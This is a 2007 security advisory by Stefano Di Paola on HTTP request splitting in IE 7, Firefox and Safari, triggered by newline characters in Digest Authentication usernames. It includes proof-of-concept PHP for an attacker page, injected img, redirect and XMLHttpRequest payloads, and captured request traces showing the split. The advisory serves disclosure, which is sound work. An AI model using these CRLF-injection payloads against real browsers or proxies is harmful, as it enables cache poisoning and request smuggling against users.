The WIse SECurity
| .italian .english |
Servizi alle Aziende
|
IE 7 and Firefox Browsers Digest Authentication Request SplittingUpdated on 27th April 2007 see updated details hereSafari is also affected by this issue.
Title:IE 7 and Firefox Browsers Digest AuthenticationOriginal Discovery and Research:Stefano Di PaolaVulnerable:Internet Explorer 7.0.5730.11Mozilla Firefox 2.0.0.3 Severity:MediumVendor :http://www.microsoft.com/http://www.mozilla.com/ Type of Vulnerability:HTTP Request SplittingTested On :Firefox 2.0.0.3 under Windows XP SP2,Firefox 2.0.0.3 under Ubuntu 6.06, Internet Explorer SP2 under Windows XP SP2. Discovery Date :20070213Release Date :20070425I) Short descriptionFirefox and Internet Explorer are prone to Http Request Splitting when Digest Authentication occurs. If anyone wants to know about HTTP Request Splitting, HTTP Request Splitting attacks are described in various papers and advisories: 1. http://www.securityfocus.com/archive/1/411585 2. http://www.webappsec.org/lists/websecurity/archive/2006-07/msg00069.html 3. http://download2.rapid7.com/r7-0026/ 4. http://www.wisec.it/docs.php?id=4 (PDF, About Auto Injection with Req.Split.) II) Long descriptionAs explained in Rfc2617 (http://www.ietf.org/rfc/rfc2617.txt) Digest Authentication is a more secure way to exchange user credentials. Rfc uses the following example: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8< The first time the client requests the document, no Authorization header is sent, so the server responds with: HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm="testrealm@host.com", qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41" The client may prompt the user for the username and password, after which it will respond with a new request, including the following Authorization header: Authorization: Digest username="Mufasa", realm="testrealm@host.com", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/dir/index.html", qop=auth, nc=00000001, cnonce="0a4f113b", response="6629fae49393a05397450978507c4ef1", opaque="5ccc069c403ebaf9f0171e9517f40e41" --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8< So there's a response by the client (browser) with username in clear. There are two ways to send credentials in html/javascript: XMLHttpRequest("GET","page",async, "user","pass"); And with img/iframes or related: <img src="http://user:pass@host/page"> But what if the username contains \r\n or urlencoded %0d%0a? Let's use an Evil page like this: --8<-- http://evilhost/req.php --8<--8<--8<--8<--8<--8<--8< <?php header('Set-Cookie: PHPSESSID=6555'); if((int)intval($_COOKIE['PHPSESSID']) !== 6555){ header('HTTP/1.0 401 Authorization Required"); header('WWW-Authenticate: Digest realm="1@example.com", \ qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",\ opaque="5ccc069c403ebaf9f0171e9517f40e41"'); header('Proxy-Connection: keep-alive'); } else { // header("Set-Cookie: PHPSESSID=0"); } header('Connection: keep-alive'); ?> <html><head> <meta http-equiv='Connection' content="keep-alive"></head> <body><script> // Some Printing in order to show document DOM properties // in the poisoned page for(var i in document) document.write(i+' '+eval('document.'+i)+'<br>'); </script> </body> </html> --8<--8<--8<--8<--8<--8<--8<--8<--8<--8< Which asks for a digest authentication only once. III) Direct URL AuthenticationLet's try it with Firefox: <img src="http://user%0aname:pp@evilhost/req.php"> Let's see what happens after the first request: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8< HTTP/1.1 401 Authorization Required Set-Cookie: PHPSESSID=6555 WWW-Authenticate: Digest realm="1@example.com", qop="auth,auth-int",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41" Proxy-Connection: keep-alive Connection: keep-alive, Keep-Alive Content-Length: 146 Keep-Alive: timeout=15, max=100 Content-Type: text/html; charset=UTF-8 ... --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8< and then Firefox resend its request: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8< GET /req.php HTTP/1.1 Host: at.tack.er User-Agent: Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3) Gecko/20060601 Firefox/2.0.0.3 (Ubuntu-edgy) Keep-Alive: 300 Connection: keep-alive Authorization: Digest username="user name", realm="1@example.com", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/req.php", response="e398c5c7583b4ca115978c486bb766f8", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=00000001, cnonce="58e1c23271698745" Cookie: PHPSESSID=6555 --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8< Everyone can see there's a splitting where the %0a was. The rest of the story is straightforward, an attacker could inject a second request, and in presence of a proxy (about 2 million people use it), a request splitting attack could be accomplished. IV) Firefox Add-OnA redirection could be used: <img src="http://evilhost/redir.php"> With redir.php : <?php header("Location: http://user%0aname:ds@avilhost/req.php"); ?> Or by using various redirectors around the web. Note: Internet Explorer 7 is not vulnerable with imgs nor with other direct requests. V) XMLHttpRequest AuthenticationIE 7 and Firefox are both vulnerable. Let's use a standard request with XMLHttpRequest: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- x=new XMLHttpRequest(); x.open("POST","req.php?",false,"user\r\nname","pass"); x.setRequestHeader("Proxy-Connection","keep-alive"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } // The payload with a request to a page with evil content x.send("RequestPayload"); --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- This will result in a similar splitting like the one with images tags. What you could do with these splittings? A lot, for example in the presence of a proxy the local proxy cache could be poisoned. The previous references details this and other attacks. Note: there is some difference between IE and Firefox, but it'll be left as an exercise for the reader. UpdateThanks to Comcor for pointing me out about thisIt looks like Safari is also affected by this issue. Request url: http://user%0aX-Foobar%3A%20uhoh%0aAuthorization%3A%20Digest%20username="name:pass@evilhost.tld/foo/ GET /foo/ HTTP/1.1 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 Paros/3.2.13 Authorization: Digest username="user X-Foobar: uh-oh Authorization: Digest username=\"name", realm="private", nonce="8tV0WgcvBAA=3efa17bd9bf4ac5f2bb9169880d6737708acfee0", uri="/foo/", response="facc3cb14eb07ad325696d05223038d3", algorithm="MD5", cnonce="a6071432b914d781a08fe75ce2c13af7", nc=00000001, qop="auth" Connection: keep-alive Proxy-Connection: keep-alive Host: evilhost.tld LEGAL NOTICESCopyright (c) 2007 Stefano di Paola Note: this exploit is DUAL LICENSED, 1. if you'll use it for personal and non-profit purposes you can apply GPL v2 and above. 2. In the case you plain to: a. use our code in any commercial context b. implement this code in your non-GPL application c. use this code during a Penetration Test d. make any profit from it you need to contact me in order to obtain a _commercial license_. For more Informations about Dual Licensing: Here Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. Florence, 25th April 2007
Wisec - Un'Idea sviluppata e mantenuta da...Wisec è scritto e mantenuto da Stefano Di Paola. Wisec usa standard aperti, inclusi XHTML, PHP e CSS2. |
Tutti i Diritti Riservati 2004
Tutti i messaggi e i metadati appartengono ai rispettivi autori.